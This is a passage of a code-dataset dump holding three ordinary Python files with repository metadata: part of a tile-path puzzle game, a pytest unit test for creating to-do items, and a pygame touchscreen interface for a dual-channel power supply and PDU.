neighbor):\n ''' Is there a break in the connection? If so return False. '''\n if self.grid.grid[tile].paths[tile_path][direction] == 1:\n if self.grid.grid[neighbor] is None:\n return False\n # Which of the neighbor's paths are we connecting to?\n if len(self.grid.grid[neighbor].paths) == 1:\n if self.grid.grid[neighbor].paths[0][(direction + 2) % 4] == 0:\n return False\n else:\n return True\n if self.grid.grid[neighbor].paths[0][(direction + 2) % 4] == 0 and\\\n self.grid.grid[neighbor].paths[1][(direction + 2) % 4] == 0:\n return False\n return True\n\n def _test_a_neighbor(self, tile, tile_path, test_path, direction,\n neighbor):\n ''' Are we connected to a neighbor's path? If so, add the neighbor\n to our paths list and to the list of tiles that need to be tested. '''\n if self.grid.grid[tile].paths[tile_path][direction] == 1:\n if self.grid.grid[neighbor] is not None:\n if not neighbor in self._paths[test_path]:\n # Which of the neighbor's paths are we connecting to?\n if self.grid.grid[neighbor].paths[0][\n (direction + 2) % 4] == 1:\n self._add_to_path_list(neighbor, 0, test_path)\n elif len(self.grid.grid[neighbor].paths) == 2 and \\\n self.grid.grid[neighbor].paths[1][\n (direction + 2) % 4] == 1:\n self._add_to_path_list(neighbor, 1, test_path)\n return True\n\n def _test_for_bad_paths(self, tile):\n ''' Is there a path to nowhere? 
'''\n self._hide_errormsgs()\n self._there_are_errors = False\n if tile is not None:\n self._check_tile(tile, [int(tile / COL), 0], NORTH,\n tile + OFFSETS[0])\n self._check_tile(tile, [tile % ROW, ROW - 1], EAST,\n tile + OFFSETS[1])\n self._check_tile(tile, [int(tile / COL), COL - 1], SOUTH,\n tile + OFFSETS[2])\n self._check_tile(tile, [tile % ROW, 0], WEST, tile + OFFSETS[3])\n\n def _check_tile(self, i, edge_check, direction, neighbor):\n ''' Can a tile be placed at position i? '''\n if edge_check[0] == edge_check[1]:\n for path in self.grid.grid[i].paths:\n if path[direction] == 1:\n self._display_errormsg(i, direction)\n else:\n if self.grid.grid[neighbor] is not None:\n my_path = 0\n your_path = 0\n for c in self.grid.grid[i].paths:\n if c[direction] == 1:\n my_path = 1\n for c in self.grid.grid[neighbor].paths:\n if c[(direction + 2) % 4] == 1:\n your_path = 1\n if my_path != your_path:\n self._display_errormsg(i, direction)\n\n def _display_errormsg(self, i, direction):\n ''' Display an error message where and when appropriate. '''\n if self._press is not None:\n dxdy = [[0.375, -0.125], [0.875, 0.375], [0.375, 0.875],\n [-0.125, 0.375]]\n x, y = self._press.get_xy()\n self._errormsg[direction].move(\n (x + dxdy[direction][0] * self.tile_width,\n y + dxdy[direction][1] * self.tile_height))\n self._errormsg[direction].set_layer(OVER_THE_TOP)\n self._there_are_errors = True\n\n def _hide_errormsgs(self):\n ''' Hide all the error messages. '''\n for i in range(4):\n self._errormsg[i].move((self.grid.left, self.grid.top))\n self._errormsg[i].set_layer(HIDE)\n\n def _hide_highlight(self):\n ''' No tile is selected. '''\n for i in range(4):\n self._highlight[i].move((self.grid.left, self.grid.top))\n self._highlight[i].set_layer(HIDE)\n\n def _move_relative_highlight(self, pos):\n for i in range(4):\n self._highlight[i].move_relative(pos)\n\n def _move_highlight(self, pos):\n x, y = pos\n self._highlight[0].move((x, y))\n self._highlight[1].move((x + 7 * self.tile_width / 8, y))\n self._highlight[2].move((x + 7 * self.tile_width / 8,\n y + 7 * self.tile_height / 8))\n self._highlight[3].move((x, y + 7 * self.tile_height / 8))\n\n def _show_highlight(self, pos=None):\n ''' Highlight the tile that is selected. 
'''\n if self.last_spr_moved is None and pos is None:\n self._hide_highlight()\n else:\n if pos is None:\n x, y = self.last_spr_moved.get_xy()\n else: # Giving a hint.\n x, y = pos\n self._move_highlight((x, y))\n for i in range(4):\n self._highlight[i].set_layer(OVER_THE_TOP)\n\n def _keypress_cb(self, area, event):\n return True\n\n def _draw_cb(self, win, context):\n ''' Callback to handle window expose events '''\n self.do_draw(context)\n return True\n\n def do_draw(self, cr):\n ''' Handle the expose-event by drawing '''\n # Restrict Cairo to the exposed area\n alloc = self._canvas.get_allocation()\n\n cr.rectangle(alloc.x, alloc.y, alloc.width, alloc.height)\n cr.clip()\n # Refresh sprite list\n self._sprites.redraw_sprites(cr=cr)\n\n def _destroy_cb(self, win, event):\n Gtk.main_quit()\n\n", "repo_name": "sugarlabs/paths", "sub_path": "game.py", "file_name": "game.py", "file_ext": "py", "file_size_in_byte": 30963, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 4, "usage_type": "call"}, {"api_name": "sugar3.graphics.style.GRID_CELL_SIZE", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sugar3.graphics.style", "line_number": 7, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 22, "usage_type": "name"}, {"api_name": "gi.repository.Gdk.EventMask", "line_number": 43, "usage_type": "attribute"}, {"api_name": "gi.repository.Gdk", "line_number": 43, "usage_type": "name"}, {"api_name": "gi.repository.Gdk.EventMask", "line_number": 44, "usage_type": "attribute"}, {"api_name": "gi.repository.Gdk", "line_number": 44, "usage_type": "name"}, {"api_name": "gi.repository.Gdk.EventMask", "line_number": 45, "usage_type": "attribute"}, {"api_name": "gi.repository.Gdk", "line_number": 45, "usage_type": "name"}, {"api_name": "gi.repository.Gdk.Screen.width", "line_number": 52, "usage_type": "call"}, {"api_name": "gi.repository.Gdk.Screen", "line_number": 52, "usage_type": "attribute"}, {"api_name": "gi.repository.Gdk", "line_number": 52, "usage_type": "name"}, {"api_name": "gi.repository.Gdk.Screen.height", "line_number": 53, "usage_type": "call"}, {"api_name": "gi.repository.Gdk.Screen", "line_number": 53, "usage_type": "attribute"}, {"api_name": "gi.repository.Gdk", "line_number": 53, "usage_type": "name"}, {"api_name": "constants.TILE_HEIGHT", "line_number": 54, "usage_type": "name"}, {"api_name": "constants.TILE_WIDTH", "line_number": 55, "usage_type": "name"}, {"api_name": "constants.TILE_HEIGHT", "line_number": 56, "usage_type": "name"}, {"api_name": "sprites.Sprites", "line_number": 59, "usage_type": "call"}, {"api_name": "grid.Grid", "line_number": 60, "usage_type": "call"}, {"api_name": "deck.Deck", "line_number": 63, "usage_type": "call"}, {"api_name": "hand.Hand", "line_number": 66, "usage_type": "call"}, {"api_name": "tile.error_graphic", "line_number": 69, "usage_type": "call"}, {"api_name": "tile.highlight_graphic", "line_number": 70, "usage_type": "call"}, {"api_name": "tile.blank_tile", "line_number": 71, "usage_type": "call"}, {"api_name": "hand.clear", "line_number": 91, "usage_type": "call"}, {"api_name": "constants.HIDE", "line_number": 110, "usage_type": "argument"}, {"api_name": "hand.Hand", "line_number": 142, "usage_type": "call"}, {"api_name": "hand.Hand", "line_number": 149, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 172, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 174, 
"usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 189, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 190, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 202, "usage_type": "call"}, {"api_name": "constants.COL", "line_number": 208, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 214, "usage_type": "name"}, {"api_name": "gettext.gettext", "line_number": 225, "usage_type": "call"}, {"api_name": "utils.json_dump", "line_number": 236, "usage_type": "call"}, {"api_name": "constants.TILES", "line_number": 244, "usage_type": "argument"}, {"api_name": "gettext.gettext", "line_number": 247, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 250, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 279, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 280, "usage_type": "call"}, {"api_name": "constants.TOP", "line_number": 321, "usage_type": "argument"}, {"api_name": "constants.HIDE", "line_number": 360, "usage_type": "name"}, {"api_name": "tile.spr.move", "line_number": 365, "usage_type": "call"}, {"api_name": "tile.spr", "line_number": 365, "usage_type": "attribute"}, {"api_name": "tile.number", "line_number": 374, "usage_type": "attribute"}, {"api_name": "tile.spr", "line_number": 383, "usage_type": "attribute"}, {"api_name": "tile.spr", "line_number": 384, "usage_type": "attribute"}, {"api_name": "tile.spr.move", "line_number": 393, "usage_type": "call"}, {"api_name": "tile.spr", "line_number": 393, "usage_type": "attribute"}, {"api_name": "tile.spr.move", "line_number": 414, "usage_type": "call"}, {"api_name": "tile.spr", "line_number": 414, "usage_type": "attribute"}, {"api_name": "tile.rotate_clockwise", "line_number": 424, "usage_type": "call"}, {"api_name": "tile.orientation", "line_number": 425, "usage_type": "attribute"}, {"api_name": "tile.spr", "line_number": 428, "usage_type": "attribute"}, {"api_name": "tile.spr", "line_number": 429, "usage_type": "attribute"}, {"api_name": "tile.spr.move", "line_number": 437, "usage_type": "call"}, {"api_name": "tile.spr", "line_number": 437, "usage_type": "attribute"}, {"api_name": "constants.COL", "line_number": 448, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 448, "usage_type": "name"}, {"api_name": "tile.spr.move", "line_number": 468, "usage_type": "call"}, {"api_name": "tile.spr", "line_number": 468, "usage_type": "attribute"}, {"api_name": "gettext.gettext", "line_number": 472, "usage_type": "call"}, {"api_name": "tile.get_value", "line_number": 481, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 484, "usage_type": "call"}, {"api_name": "constants.OVER_THE_TOP", "line_number": 486, "usage_type": "argument"}, {"api_name": "constants.COL", "line_number": 491, "usage_type": "argument"}, {"api_name": "constants.ROW", "line_number": 504, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 504, "usage_type": "name"}, {"api_name": "constants.GRID", "line_number": 506, "usage_type": "argument"}, {"api_name": "constants.HIDE", "line_number": 508, "usage_type": "argument"}, {"api_name": "constants.ROW", "line_number": 512, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 512, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 517, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 520, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 524, "usage_type": "name"}, {"api_name": 
"constants.COL", "line_number": 524, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 528, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 534, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 534, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 535, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 535, "usage_type": "name"}, {"api_name": "gettext.gettext", "line_number": 545, "usage_type": "call"}, {"api_name": "constants.ROW", "line_number": 550, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 550, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 551, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 551, "usage_type": "name"}, {"api_name": "tile.spr.move", "line_number": 558, "usage_type": "call"}, {"api_name": "tile.spr", "line_number": 558, "usage_type": "attribute"}, {"api_name": "tile.spr.set_layer", "line_number": 559, "usage_type": "call"}, {"api_name": "constants.TILES", "line_number": 559, "usage_type": "argument"}, {"api_name": "tile.spr", "line_number": 559, "usage_type": "attribute"}, {"api_name": "gettext.gettext", "line_number": 564, "usage_type": "call"}, {"api_name": "tile.rotate_clockwise", "line_number": 575, "usage_type": "call"}, {"api_name": "constants.NORTH", "line_number": 677, "usage_type": "argument"}, {"api_name": "constants.COL", "line_number": 677, "usage_type": "name"}, {"api_name": "constants.EAST", "line_number": 679, "usage_type": "argument"}, {"api_name": "constants.ROW", "line_number": 679, "usage_type": "name"}, {"api_name": "constants.SOUTH", "line_number": 681, "usage_type": "argument"}, {"api_name": "constants.COL", "line_number": 681, "usage_type": "name"}, {"api_name": "constants.WEST", "line_number": 683, "usage_type": "argument"}, {"api_name": "constants.ROW", "line_number": 683, "usage_type": "name"}, {"api_name": "constants.OVER_THE_TOP", "line_number": 713, "usage_type": "argument"}, {"api_name": "constants.HIDE", "line_number": 720, "usage_type": "argument"}, {"api_name": "constants.HIDE", "line_number": 726, "usage_type": "argument"}, {"api_name": "constants.OVER_THE_TOP", "line_number": 751, "usage_type": "argument"}, {"api_name": "gi.repository.Gtk.main_quit", "line_number": 772, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 772, "usage_type": "name"}]} +{"seq_id": "16147226662", "text": "import pytest\nfrom unittest import mock\nimport uuid\n\nfrom src.application.todo.CreateTodo import CreateTodo\nfrom src.domain.user.errors import UserNotFoundError\n\n\n@pytest.fixture\ndef todo():\n return {\n 'uid': 'test',\n 'content': 'test content'\n }\n\n\ndef test_create_todo(todo):\n repo = mock.Mock()\n user_repo = mock.Mock()\n id = str(uuid.uuid4())\n repo.generate_id.return_value = id\n create_todo = CreateTodo(repo, user_repo)\n inputs = CreateTodo.Inputs(**todo)\n result = create_todo(inputs)\n repo.persist.assert_called_once_with({\n 'uid': todo['uid'],\n 'content': todo['content'],\n 'id': id\n })\n repo.generate_id.assert_called_once()\n user_repo.exists.assert_called_once()\n user_repo.add_todo.assert_called_once_with(todo['uid'], id)\n assert result.content == todo['content']\n assert result.id == id\n\n\ndef test_should_fail_if_user_does_not_exist(todo):\n repo = mock.Mock()\n user_repo = mock.Mock()\n user_repo.exists.return_value = False\n create_todo = CreateTodo(repo, user_repo)\n inputs = CreateTodo.Inputs(**todo)\n with 
pytest.raises(UserNotFoundError):\n create_todo(inputs)\n", "repo_name": "juansensio/architecture", "sub_path": "src/tests/unit/test_create_todo.py", "file_name": "test_create_todo.py", "file_ext": "py", "file_size_in_byte": 1185, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytest.fixture", "line_number": 9, "usage_type": "attribute"}, {"api_name": "unittest.mock.Mock", "line_number": 18, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 18, "usage_type": "name"}, {"api_name": "unittest.mock.Mock", "line_number": 19, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 19, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 20, "usage_type": "call"}, {"api_name": "src.application.todo.CreateTodo.CreateTodo", "line_number": 22, "usage_type": "call"}, {"api_name": "src.application.todo.CreateTodo.CreateTodo.Inputs", "line_number": 23, "usage_type": "call"}, {"api_name": "src.application.todo.CreateTodo.CreateTodo", "line_number": 23, "usage_type": "name"}, {"api_name": "unittest.mock.Mock", "line_number": 38, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 38, "usage_type": "name"}, {"api_name": "unittest.mock.Mock", "line_number": 39, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 39, "usage_type": "name"}, {"api_name": "src.application.todo.CreateTodo.CreateTodo", "line_number": 41, "usage_type": "call"}, {"api_name": "src.application.todo.CreateTodo.CreateTodo.Inputs", "line_number": 42, "usage_type": "call"}, {"api_name": "src.application.todo.CreateTodo.CreateTodo", "line_number": 42, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 43, "usage_type": "call"}, {"api_name": "src.domain.user.errors.UserNotFoundError", "line_number": 43, "usage_type": "argument"}]} +{"seq_id": "71679802087", "text": "#!/usr/bin/env python\nimport time\nimport serial\n\nimport pygame\n\nfrom pygame.locals import *\nfrom ui import widgets, surface\nimport psu\n\nimport random\n\n\nclass PresetScreen(object):\n def __init__(self, display, psu, parent):\n self.display = display\n self.parent = parent\n self.psu = psu\n self.active = False\n\n self.screen = widgets.Pannel(display)\n\n frame = self.screen.addWidget(widgets.Frame,\n \"Select preset\", 2, 2, 318, 238)\n\n frame.addWidget(widgets.Button, \"3.3 / -3.3\", 2, 2, 120, 40,\n self.setPreset(3300))\n frame.addWidget(widgets.Button, \"5 / -5\", 2, 47, 120, 40,\n self.setPreset(5000))\n frame.addWidget(widgets.Button, \"9 / -9\", 2, 92, 120, 40,\n self.setPreset(9000))\n frame.addWidget(widgets.Button, \"12 / -12\", 2, 137, 120, 40,\n self.setPreset(12000))\n frame.addWidget(widgets.Button, \"15 / -15\", 2, 182, 120, 40,\n self.setPreset(15000))\n\n self.screen.addWidget(widgets.Button, \"Cancel\", 230, 190, 80, 40, self.cancel)\n\n def setVoltage(self, voltage):\n self.active = False\n self.psu.setVoltage(1, voltage)\n self.psu.setVoltage(2, -1 * voltage)\n\n def setPreset(self, voltage):\n return lambda: self.setVoltage(voltage)\n\n def cancel(self):\n self.active = False\n\n def activate(self):\n self.active = True\n self.display.clear()\n self.screen.draw()\n self.mainLoop()\n\n def mainLoop(self):\n while self.active:\n self.screen.update()\n\n self.parent.clock.tick(40)\n\n for event in pygame.event.get():\n if event.type in (QUIT, KEYDOWN):\n self.active = False\n\n self.screen.sendEvent(event)\n self.parent.activate()\n\n\nclass ConfigScreen(object):\n def 
__init__(self, display, psu, channel, parent, negative=False):\n self.display = display\n self.channel = channel\n self.parent = parent\n self.psu = psu\n self.active = False\n self.negative = negative\n\n self.screen = widgets.Pannel(display)\n\n frame = self.screen.addWidget(widgets.Frame,\n \"Voltage\", 2, 2, 150, 155)\n self.vdisp = frame.addWidget(widgets.SevenSegment, 5, 37, 143, 60,\n digits=3, msd=2, colour=widgets.Colours.electric_blue)\n \n bw = 28\n frame.addWidget(widgets.UpButton, 59, 4, bw, bw, self.setVDisp(1),\n colour=widgets.Colours.electric_blue)\n frame.addWidget(widgets.UpButton, 106, 4, bw, bw, self.setVDisp(0.1),\n colour=widgets.Colours.electric_blue)\n frame.addWidget(widgets.DownButton, 59, 100, bw, bw, self.setVDisp(-1),\n colour=widgets.Colours.electric_blue)\n frame.addWidget(widgets.DownButton, 106, 100, bw, bw, self.setVDisp(-0.1),\n colour=widgets.Colours.electric_blue)\n\n cframe = self.screen.addWidget(widgets.Frame,\n \"Current\", 162, 2, 150, 155)\n self.cdisp = cframe.addWidget(widgets.SevenSegment, 5, 37, 143, 60,\n digits=3, msd=1, colour=widgets.Colours.electric_blue)\n\n cframe.addWidget(widgets.UpButton, 12, 4, bw, bw, self.setCDisp(1),\n colour=widgets.Colours.electric_blue)\n cframe.addWidget(widgets.UpButton, 59, 4, bw, bw, self.setCDisp(0.1),\n colour=widgets.Colours.electric_blue)\n cframe.addWidget(widgets.UpButton, 106, 4, bw, bw, self.setCDisp(0.01),\n colour=widgets.Colours.electric_blue)\n\n cframe.addWidget(widgets.DownButton, 12, 100, bw, bw, self.setCDisp(-1),\n colour=widgets.Colours.electric_blue)\n cframe.addWidget(widgets.DownButton, 59, 100, bw, bw, self.setCDisp(-0.1),\n colour=widgets.Colours.electric_blue)\n cframe.addWidget(widgets.DownButton, 106, 100, bw, bw, self.setCDisp(-0.01),\n colour=widgets.Colours.electric_blue)\n\n self.screen.addWidget(widgets.Button, \"Save\", 140, 190, 80, 40, self.save)\n self.screen.addWidget(widgets.Button, \"Cancel\", 230, 190, 80, 40, self.cancel)\n\n def setMax(self, disp, inc, mx):\n disp.value += inc\n\n if disp.value > mx:\n disp.value = mx\n if disp.value < 0:\n disp.value = 0\n\n def save(self):\n self.psu.setCurrent(self.channel, int(self.cdisp.value*1000))\n self.psu.setVoltage(self.channel, int(self.vdisp.value*1000))\n self.active = False\n\n def cancel(self):\n self.active = False\n\n def setVDisp(self, inc):\n return lambda: self.setMax(self.vdisp, inc, 15) \n\n def setCDisp(self, inc):\n return lambda: self.setMax(self.cdisp, inc, 1.5) \n\n def activate(self):\n self.vdisp.value = self.psu.vset[self.channel - 1]/1000.0\n self.cdisp.value = self.psu.cset[self.channel - 1]/1000.0\n self.active = True\n self.display.clear()\n self.screen.draw()\n self.mainLoop()\n\n def mainLoop(self):\n while self.active:\n self.screen.update()\n\n self.parent.clock.tick(40)\n\n for event in pygame.event.get():\n if event.type in (QUIT, KEYDOWN):\n self.active = False\n\n self.screen.sendEvent(event)\n self.parent.activate()\n\nclass PowerSupply(object):\n def __init__(self, display, ser):\n self.display = display\n self.psu = psu.PSU(ser)\n self.maxV = 16\n\n self.mainScreen = widgets.Pannel(display)\n self.configScreen1 = ConfigScreen(display, self.psu, 1, self)\n self.configScreen2 = ConfigScreen(display, self.psu, 2, self, True)\n self.presetScreen = PresetScreen(display, self.psu, self)\n\n self.screen = self.mainScreen\n\n self.mainScreen.addWidget(widgets.Button, \"Presets\", 225, 138, 90, 40,\n callback=self.openPresets)\n\n self.ite = self.mainScreen.addWidget(widgets.ToggleButton, \"Main 
On\",\n \"Main Off\", 225, 190, 90, 40, callback=self.togglePower)\n\n # Channel 1\n ch1 = self.mainScreen.addWidget(widgets.Frame, \"Channel 1\", 1, 1, 220, 110)\n self.posv = ch1.addWidget(widgets.FancyGauge,\n 1, 3, 40,\n units=\"Volts\",\n colour=widgets.Colours.electric_blue,\n valueFormat=\"%.2f\",\n maxScale=self.maxV\n )\n self.posc = ch1.addWidget(widgets.FancyGauge,\n 85, 3, 40,\n units=\"Amps\",\n colour=widgets.Colours.electric_blue,\n valueFormat=\"%.2f\",\n maxScale=self.maxV\n )\n ch1.addWidget(widgets.Button, \"Setup\", 172, 52, 40, 30,\n callback=self.btnConfig1)\n\n # Channel 2\n ch2 = self.mainScreen.addWidget(widgets.Frame, \"Channel 2\", 1, 120, 220, 110)\n self.negv = ch2.addWidget(widgets.FancyGauge,\n 1, 3, 40,\n units=\"Volts\",\n colour=widgets.Colours.electric_blue,\n valueFormat=\"-%.2f\",\n maxScale=self.maxV\n )\n self.negc = ch2.addWidget(widgets.FancyGauge,\n 85, 3, 40,\n units=\"Amps\",\n colour=widgets.Colours.electric_blue,\n valueFormat=\"%.2f\",\n maxScale=self.maxV\n )\n ch2.addWidget(widgets.Button, \"Setup\", 172, 52, 40, 30,\n callback=self.btnConfig2)\n\n # PDU frame\n pdu = self.mainScreen.addWidget(widgets.Frame, \"PDU\", 225, 1, 90, 110)\n\n # Toggle buttons \n self.toggle_widgets = [\n ch1.addWidget(widgets.ToggleButton,\n \"On\", \"Off\", 172, 10, 40, 30, callback=self.btnEn1),\n ch2.addWidget(widgets.ToggleButton,\n \"On\", \"Off\", 172, 10, 40, 30, callback=self.btnEn2),\n pdu.addWidget(widgets.ToggleButton,\n \"AC 1\", \"AC 1\", 10, 10, 30, 30, callback=self.btnAc1),\n pdu.addWidget(widgets.ToggleButton,\n \"AC 2\", \"AC 2\", 50, 10, 30, 30, callback=self.btnAc2),\n pdu.addWidget(widgets.ToggleButton,\n \"AC 3\", \"AC 3\", 10, 50, 30, 30, callback=self.btnAc3),\n pdu.addWidget(widgets.ToggleButton,\n \"AC 4\", \"AC 4\", 50, 50, 30, 30, callback=self.btnAc4),\n ]\n\n self.clock = pygame.time.Clock()\n self.c = time.time()\n self.long_c = time.time()\n self.active = False\n\n self.ncvals = []\n self.pcvals = []\n\n self.activate()\n\n def activate(self):\n self.display.clear()\n self.mainScreen.draw()\n if not self.active:\n self.active = True\n self.mainLoop()\n\n def togglePower(self, state):\n self.psu.toggleInput(state)\n\n def openPresets(self):\n self.presetScreen.activate()\n\n def btnConfig1(self):\n self.configScreen1.activate()\n\n def btnConfig2(self):\n self.configScreen2.activate()\n\n def btnEn1(self, state):\n if not state:\n self.psu.outputEnable(1)\n else:\n self.psu.outputDisable(1)\n\n def btnEn2(self, state):\n if not state:\n self.psu.outputEnable(2)\n else:\n self.psu.outputDisable(2)\n\n def btnAc1(self, state):\n if state:\n self.psu.acEnable(1)\n else:\n self.psu.acDisable(1)\n\n def btnAc2(self, state):\n if state:\n self.psu.acEnable(2)\n else:\n self.psu.acDisable(2)\n\n def btnAc3(self, state):\n if state:\n self.psu.acEnable(3)\n else:\n self.psu.acDisable(3)\n\n def btnAc4(self, state):\n if state:\n self.psu.acEnable(4)\n else:\n self.psu.acDisable(4)\n\n def tick(self):\n self.psu.tick()\n\n def slowTick(self):\n self.psu.updateState()\n self.ite.setState(self.psu.transformer)\n self.posv.value = self.psu.voltageP/1000.0\n if self.psu.currentP >= 0:\n self.pcvals.append(self.psu.currentP/1000.0)\n self.posc.value = max(self.pcvals)\n if len(self.pcvals) > 5:\n self.pcvals.pop(0)\n \n self.negv.value = -1*(self.psu.voltageN/1000.0)\n\n if self.psu.currentN >= 0:\n self.ncvals.append(self.psu.currentN/1000.0)\n self.negc.value = max(self.ncvals)\n if len(self.ncvals) > 5:\n self.ncvals.pop(0)\n\n q = False\n\n 
for i, w in enumerate(self.toggle_widgets):\n q = q or w.setState(self.psu.state_ar[i])\n\n if q:\n self.mainScreen.display.flip()\n\n def mainLoop(self):\n while self.active:\n self.mainScreen.update()\n\n if (time.time() - self.c > 0.02):\n self.c = time.time()\n self.tick()\n\n if (time.time() - self.long_c > 0.3):\n self.long_c = time.time()\n self.slowTick()\n\n self.clock.tick(40)\n\n for event in pygame.event.get():\n if event.type in (QUIT, KEYDOWN):\n self.active = False\n\n self.mainScreen.sendEvent(event)\n\nif __name__ == '__main__': \n ser = serial.Serial('/dev/serial0', 57600)\n #ser = psu.FakePSU(None, None)\n mypsu = PowerSupply(surface.TouchScreen(), ser)\n #mypsu = PowerSupply(surface.Dev(), ser)\n mypsu.activate()\n", "repo_name": "calston/piwerlab", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 11450, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "ui.widgets.Pannel", "line_number": 21, "usage_type": "call"}, {"api_name": "ui.widgets", "line_number": 21, "usage_type": "name"}, {"api_name": "ui.widgets.Frame", "line_number": 23, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 23, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 26, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 26, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 28, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 28, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 30, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 30, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 32, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 32, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 34, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 34, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 37, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 37, "usage_type": "name"}, {"api_name": "pygame.event.get", "line_number": 62, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 62, "usage_type": "attribute"}, {"api_name": "ui.widgets.Pannel", "line_number": 79, "usage_type": "call"}, {"api_name": "ui.widgets", "line_number": 79, "usage_type": "name"}, {"api_name": "ui.widgets.Frame", "line_number": 81, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 81, "usage_type": "name"}, {"api_name": "ui.widgets.SevenSegment", "line_number": 83, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 83, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 84, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 84, "usage_type": "name"}, {"api_name": "ui.widgets.UpButton", "line_number": 87, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 87, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 88, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 88, "usage_type": "name"}, {"api_name": "ui.widgets.UpButton", "line_number": 89, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 89, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 90, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 90, "usage_type": "name"}, 
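# Illustrative sketch, separate from the scraped piwerlab record above: its mainLoop
# interleaves a fast hardware tick (roughly every 20 ms, psu.tick()) with a slower
# state refresh (roughly every 300 ms, slowTick()) by comparing time.time() deltas
# inside one loop. A minimal standalone version of that dual-rate scheduling pattern;
# fast_tick/slow_tick are hypothetical stand-ins for the real callbacks.
import time

def run_dual_rate_loop(fast_tick, slow_tick, fast_period=0.02, slow_period=0.3, duration=1.0):
    start = time.time()
    last_fast = last_slow = start
    while time.time() - start < duration:
        now = time.time()
        if now - last_fast > fast_period:
            last_fast = now
            fast_tick()            # frequent, cheap work (e.g. polling the device)
        if now - last_slow > slow_period:
            last_slow = now
            slow_tick()            # infrequent, heavier work (e.g. UI refresh)
        time.sleep(0.001)          # yield briefly instead of busy-waiting

# Example usage with no-op callbacks:
# run_dual_rate_loop(lambda: None, lambda: None, duration=0.1)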
{"api_name": "ui.widgets.DownButton", "line_number": 91, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 91, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 92, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 92, "usage_type": "name"}, {"api_name": "ui.widgets.DownButton", "line_number": 93, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 93, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 94, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 94, "usage_type": "name"}, {"api_name": "ui.widgets.Frame", "line_number": 96, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 96, "usage_type": "name"}, {"api_name": "ui.widgets.SevenSegment", "line_number": 98, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 98, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 99, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 99, "usage_type": "name"}, {"api_name": "ui.widgets.UpButton", "line_number": 101, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 101, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 102, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 102, "usage_type": "name"}, {"api_name": "ui.widgets.UpButton", "line_number": 